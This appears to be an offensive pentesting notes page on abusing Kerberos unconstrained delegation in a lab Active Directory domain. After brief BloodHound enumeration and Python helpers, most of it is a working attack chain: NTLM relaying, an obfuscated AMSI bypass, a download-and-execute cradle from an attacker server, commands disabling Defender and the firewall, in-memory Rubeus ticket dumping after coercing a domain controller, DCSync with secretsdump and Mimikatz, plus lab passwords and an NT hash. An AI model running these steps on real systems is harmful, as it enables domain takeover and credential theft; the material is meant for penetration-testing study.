Attacking Active Directory

Unconstrained delegation Enum


Last updated 2 years ago

Unconstrained delegation is a configuration that attackers can use to impersonate a user or service account and gain access to sensitive resources in an organization's network: a computer trusted for unconstrained delegation receives, and keeps in memory, a copy of the TGT of every account that authenticates to it, so whoever controls that computer can reuse those TGTs. To mitigate the risk, organizations should identify every such configuration, apply least privilege, remediate, and replace unconstrained delegation with resource-based constrained delegation wherever possible.

  • One way to find unconstrained delegation is to look in BloodHound:

MATCH (c {unconstraineddelegation:true}) return c

If you want to search for systems with unconstrained delegation other than domain controllers:

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
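The same check the two Cypher queries above perform, as an added Python example that is not part of the original page: computers are classified from their raw userAccountControl bits and msDS-AllowedToDelegateTo attribute, and domain controllers (primaryGroupID 516 or SERVER_TRUST_ACCOUNT) are excluded just as the second query does. The host names and attribute values are constructed sample data, and the LDAP filter helper is an equivalent you could feed to ldapsearch.

```python
# Added example, not from the original page: the check the BloodHound queries above perform,
# applied to raw LDAP attributes. Names and attribute values below are constructed sample data.
UF_SERVER_TRUST_ACCOUNT = 0x2000               # domain controller machine account
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
DOMAIN_CONTROLLERS_RID = 516                   # the '-516' group in the Cypher query
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

SAMPLE_COMPUTERS = [  # hypothetical hosts; uac 0x1000 = workstation trust account
    {"name": "DC01$",  "userAccountControl": 0x82000,   "primaryGroupID": 516, "msDS-AllowedToDelegateTo": []},
    {"name": "DC02$",  "userAccountControl": 0x82000,   "primaryGroupID": 516, "msDS-AllowedToDelegateTo": []},
    {"name": "WEB01$", "userAccountControl": 0x81000,   "primaryGroupID": 515, "msDS-AllowedToDelegateTo": []},
    {"name": "SQL01$", "userAccountControl": 0x1001000, "primaryGroupID": 515, "msDS-AllowedToDelegateTo": ["cifs/fs01.corp.example"]},
    {"name": "FS01$",  "userAccountControl": 0x1000,    "primaryGroupID": 515, "msDS-AllowedToDelegateTo": ["ldap/dc01.corp.example"]},
    {"name": "WS01$",  "userAccountControl": 0x1000,    "primaryGroupID": 515, "msDS-AllowedToDelegateTo": []},
]

def delegation_type(entry):
    """Classify one computer object; 'unconstrained' is what BloodHound's unconstraineddelegation flag means."""
    uac = entry["userAccountControl"]
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if entry.get("msDS-AllowedToDelegateTo"):
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained (protocol transition)"
        return "constrained"
    return "none"

def is_domain_controller(entry):
    """DCs are unconstrained by design, so they are excluded like the second Cypher query does."""
    return (entry["primaryGroupID"] == DOMAIN_CONTROLLERS_RID
            or bool(entry["userAccountControl"] & UF_SERVER_TRUST_ACCOUNT))

def unconstrained_non_dc(entries):
    """Non-DC hosts with unconstrained delegation: the ones to remediate first."""
    return sorted(e["name"] for e in entries
                  if delegation_type(e) == "unconstrained" and not is_domain_controller(e))

def unconstrained_ldap_filter():
    """LDAP filter equivalent of the first Cypher query (bitwise AND on userAccountControl)."""
    return (f"(&(objectCategory=computer)(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:="
            f"{UF_TRUSTED_FOR_DELEGATION}))")

if __name__ == "__main__":
    for e in SAMPLE_COMPUTERS:
        print(f"{e['name']:7} dc={is_domain_controller(e)!s:5} {delegation_type(e)}")
    print("non-DC unconstrained:", unconstrained_non_dc(SAMPLE_COMPUTERS))
```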

Run ntlmrelayx.py and wait for a connection from fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Run smbexec to get an interactive shell

sudo proxychains smbexec.py -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22' -shell-type powershell

Prepare our server containing Rubeus.exe and our AMSI bypass.

python3 -m http.server 8080

In the shell session, bypass AMSI:

#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )



$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX

#check status of Defender

Get-MpComputerStatus

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
netsh advfirewall set allprofiles state off


#Default Writeable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing


#List AppLocker rules
$a = Get-AppLockerPolicy -Effective
$a.RuleCollections

Now launch Rubeus in memory with execute-assembly. First, list the available tickets:

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

Now coerce the DC NYC into authenticating to the DC Bronx:

python3 coercer.py -u claudio.ortiz -d north.newyork.local -p bayboy -t NYC.Newyork.local -l Bronx

Run triage again:

[Rubeus.Program]::MainString("triage")

The TGT of NYC$ is now present.

To extract it, relaunch coercer and one second later run the following dump command (I don’t know why, but Rubeus monitor mode doesn’t want to run via execute-assembly):


[Rubeus.Program]::MainString("dump /user:NYC$ /service:krbtgt /nowrap");

We now have the TGT of the domain controller

Let’s continue on Linux to pass the ticket and launch DCSync with secretsdump:

Copy the ticket without spaces or line breaks (in vim I do: :%s/\s*\n\s*//g), convert the ticket to ccache, use the Kerberos ticket and launch secretsdump:

cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC
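The whitespace cleanup and sanity check from the step above, as an added Python example that is not part of the original page: it strips the console line breaks and indentation from pasted Rubeus /nowrap output, decodes it, and verifies the result is a complete KRB-CRED (.kirbi) by comparing the outer DER length with the bytes actually received, so a partial copy is caught before ticketConverter.py sees it. The sample blob is constructed and is not a real ticket.

```python
import base64
import re
import textwrap

KRB_CRED_TAG = 0x76  # ASN.1 [APPLICATION 22]: every .kirbi (KRB-CRED) blob starts with this byte

def clean_base64(text):
    """Strip all whitespace, which is what the vim substitution on the page does."""
    return re.sub(r"\s+", "", text)

def der_total_length(blob):
    """Total bytes the outermost DER element spans (tag + length octets + content)."""
    if len(blob) < 2:
        raise ValueError("blob too short to hold a DER header")
    first = blob[1]
    if first < 0x80:                       # short form: the octet is the content length
        return 2 + first
    n = first & 0x7F                       # long form: n big-endian length octets follow
    if n == 0 or len(blob) < 2 + n:
        raise ValueError("indefinite or truncated DER length")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")

def b64_to_kirbi(text):
    """Decode pasted Rubeus /nowrap output and verify it is one complete KRB-CRED."""
    blob = base64.b64decode(clean_base64(text), validate=True)
    if not blob or blob[0] != KRB_CRED_TAG:
        raise ValueError("not a KRB-CRED: first byte is not 0x76")
    expected = der_total_length(blob)
    if expected != len(blob):
        raise ValueError(f"incomplete paste: DER header says {expected} bytes, got {len(blob)}")
    return blob

def is_complete_kirbi(text):
    try:
        b64_to_kirbi(text)
        return True
    except ValueError:               # binascii.Error (bad base64) is a ValueError subclass
        return False

# Constructed sample (not a real ticket): APPLICATION 22 wrapping a 128-byte SEQUENCE, so the
# long-form length path is exercised; then wrapped at 64 columns and indented like console output.
SAMPLE_KIRBI = bytes([0x76, 0x81, 0x80, 0x30, 0x7E]) + bytes(126)
SAMPLE_PASTE = "\n".join("   " + line for line in
                         textwrap.wrap(base64.b64encode(SAMPLE_KIRBI).decode(), 64)) + "\n"
TRUNCATED_PASTE = base64.b64encode(SAMPLE_KIRBI[:100]).decode()  # valid base64, cut-off ticket
```

A successful call returns the bytes to write to ticket.kirbi; the two failure modes (mid-line cut and cut-off blob) raise instead of producing a file ticketConverter.py will reject later.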
#Enumerate delegation settings with PowerView
Import-Module .\powerview.ps1
Get-DomainComputer -TrustedToAuth   # computers with msDS-AllowedToDelegateTo set (constrained delegation)

Triage all current tickets (if elevated, lists all users):
.\Rubeus.exe triage

List all current tickets in detail (if elevated, lists all users):
.\Rubeus.exe klist



. .\Invoke-Mimikatz.ps1
Invoke-Mimikatz
#RC4 (NT) hash of the student$ machine account recovered above (value from the page), reused by kekeo below
aa81bb97a48748ad89541137bf78001f

#ask dc for a tgt for the student server
#Download kekeo:
https://github.com/gentilkiwi/kekeo/releases
kekeo.exe
tgt::ask /user:student$ /domain:pentesting.local /rc4:aa81bb97a48748ad89541137bf78001f

#ask dc for a tgs for the student server
tgs::s4u /tgt:TGT_student$@PENTESTING.LOCAL_krbtgt~pentesting.local@PENTESTING.LOCAL.kirbi /user:Administrator@pentesting.local /service:time/ad.pentesting.local|ldap/ad.pentesting.local

#use the tgs and inject it
. ..\..\invoke-mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@pentesting.local@PENTESTING.LOCAL_student$@PENTESTING.LOCAL.kirbi"'

#DCSync to perform a golden ticket attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:pentesting\krbtgt"'

#Look at this if it does not work:
https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203

#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

With a SOCKS connection you can only use smbexec or atexec; wmiexec, psexec and dcomexec will not work (explanation here: https://github.com/SecureAuthCorp/impacket/issues/412).